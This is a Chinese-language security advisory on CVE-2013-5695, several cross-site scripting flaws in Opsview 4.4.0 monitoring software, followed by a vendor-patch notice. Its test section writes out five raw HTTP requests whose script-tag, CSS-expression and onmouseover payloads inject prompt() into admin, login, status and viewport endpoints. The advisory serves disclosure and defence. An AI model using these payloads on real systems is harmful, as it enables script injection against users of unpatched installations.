Opsview 多个跨站脚本漏洞(CVE-2013-5695)
发布日期:2013-10-28
更新日期:2013-10-29
受影响系统:Opsview Opsview 4.4.0
描述:
BUGTRAQ ID:
63383
CVE(CAN) ID:
CVE-2013-5695
Opsview是企业级网络、IT、服务器、应用及云监控软件。
Opsview 4.4.0及其他版本存在多个跨站脚本漏洞,攻击者可利用此漏洞在受影响站点用户浏览器中执行任意代码。
<*来源:J. Oquendo
链接:
http://www.securityfocus.com/archive/1/529482
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no
------------
POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
&from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit
------------
GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
建议:
厂商补丁:
Opsview
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.opsview.com
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes浏览次数:2325
严重程度:0(网友投票)
